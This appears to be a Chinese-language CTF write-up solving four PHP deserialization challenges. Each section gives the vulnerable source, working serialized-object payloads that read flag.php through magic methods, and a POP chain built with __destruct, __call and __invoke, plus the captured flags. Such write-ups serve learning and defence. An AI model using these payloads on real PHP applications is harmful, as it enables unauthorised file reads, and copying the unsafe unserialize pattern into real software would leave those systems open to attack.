几道php反序列化解题记录

serialize01

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

class A{
public $classname;
function __toString(){
echo file_get_contents($this->classname);
return "";
}
}

echo unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

1
2
A类中有魔幻函数,index.php中unserialize函数参数可控
构造payload: O:1:"A":1:{s:9:"classname";s:8:"flag.php";},反序列化之后,有一个classname变量,内容为flag.php。当index.php执行echo操作时,会自动触发A类中的__tostring()函数,然后通过echo file_get_contents($this->file)输出flag.php里面的内容

payload and flag:

1
2
3
4
5
http://8e023c5a6336fedd.synctf.com:8002/serialize/serialize01/index.php?a=O:1:"A":1:{s:9:"classname";s:8:"flag.php";}

<?php
$flag = "SYNCTF{SJshNZJ_Hasjcxzm}";
?>

serialize02

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

class A{
public $classname;
function __wakeup(){
echo file_get_contents($this->classname);
return "";
}
}

unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

1
2
3
4
5
flag在flag.php里面

A类中有魔幻函数,index.php中unserialize函数参数可控

构造payload: O:1:"A":1:{s:9:"classname";s:8:"flag.php";},反序列化之后,有一个classname变量,内容为flag.php。当index.php执行echo操作时,会自动触发A类中的__wakeup()函数,然后通过echo file_get_contents($this->file)输出flag.php里面的内容

payload and flag:

1
2
3
4
5
http://8e023c5a6336fedd.synctf.com:8002/serialize/serialize02/index.php?a=O:1:%22A%22:1:{s:9:%22classname%22;s:8:%22flag.php%22;}

<?php
$flag = "SYNCTF{QPlMXHams_smAHSAJ}";
?>

serialize03

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php

class A{
public $classname;
function __wakeup(){
unserialize($this->classname);
return '';
}
}
class B{
private $filename;
function __wakeup(){
echo file_get_contents($this->filename);
return '';
}
}

unserialize($_GET['a']);
highlight_file(__FILE__);

?>

writeup:

1
2
3
4
5
6
7
8
9
反序列化利用代码:
echo serialize(new A);
echo serialize(new B);

说明:

flag在flag.php里面

因为private是类名B两边都有%00所以同样在url上面体现

payload and flag:

1
2
3
4
5
payload: O:1:"A":1:{s:9:"classname";O:1:"B":1:{s:11:"%00B%00filename";s:8:"flag.php";};}

<?php
$flag = "SYNCTF{JSasjd_HJshhsh}";
?>

serialize05

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?php
class start_gg
{
public $mod1;
public $mod2;
public function __destruct()
{
$this->mod1->test1();
}
}
class Call
{
public $mod1;
public $mod2;
public function test1()
{
$this->mod1->test2();
}
}
class funct
{
public $mod1;
public $mod2;
public function __call($test2,$arr)
{
$s1 = $this->mod1;
$s1();
}
}
class func
{
public $mod1;
public $mod2;
public function __invoke()
{
$this->mod2 = "字符串拼接".$this->mod1;
}
}
class string1
{
public $str1;
public $str2;
public function __toString()
{
$this->str1->get_flag();
return "1";
}
}
class GetFlag
{
public function get_flag()
{
echo "flag:"."xxxxxxxxxxxx";
}
}
$a = $_GET['string'];
unserialize($a);
?>

writeup:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
根据一层一层的关系写入来构造payload的代码,POP链构造:

<?php
class start_gg
{
public $mod1;
public $mod2;
public function __construct()
{
$this->mod1 = new Call();
}
public function __destruct()
{
$this->mod1->test1();
}
}
class Call
{
public $mod1;
public $mod2;
public function __construct()
{
$this->mod1 = new funct();
}
public function test1()
{
$this->mod1->test2();
}
}
class funct
{
public $mod1;
public $mod2;
public function __construct()
{
$this->mod1 = new func();
}
public function __call($test2,$arr)
{
$s1 = $this->mod1;
$s1();
}
}
class func
{
public $mod1;
public $mod2;
public function __construct()
{
$this->mod1=new string1();
}
public function __invoke()
{
$this->mod2 = "字符串拼接".$this->mod1;
}
}
class string1
{
public $str1;
public $str2;
public function __construct()
{
$this->str1=new GetFlag();
}
public function __toString()
{
$this->str1->get_flag();
return "1";
}
}
class GetFlag
{
public function get_flag()
{
echo "flag:"."xxxxxxxxxxxx";
}
}
$a = new start_gg();
echo serialize($a);
?>

payload and flag:

1
2
3
4
O:8:"start_gg":2:{s:4:"mod1";O:4:"Call":2:{s:4:"mod1";O:5:"funct":2:{s:4:"mod1";O:4:"func":2:{s:4:"mod1";O:7:"string1":2:{s:4:"str1";O:7:"GetFlag":0:{}s:4:"str2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}s:4:"mod2";N;}


SYNCTF{mlaALQ_KMjmajsd}

Welcome to my other publishing channels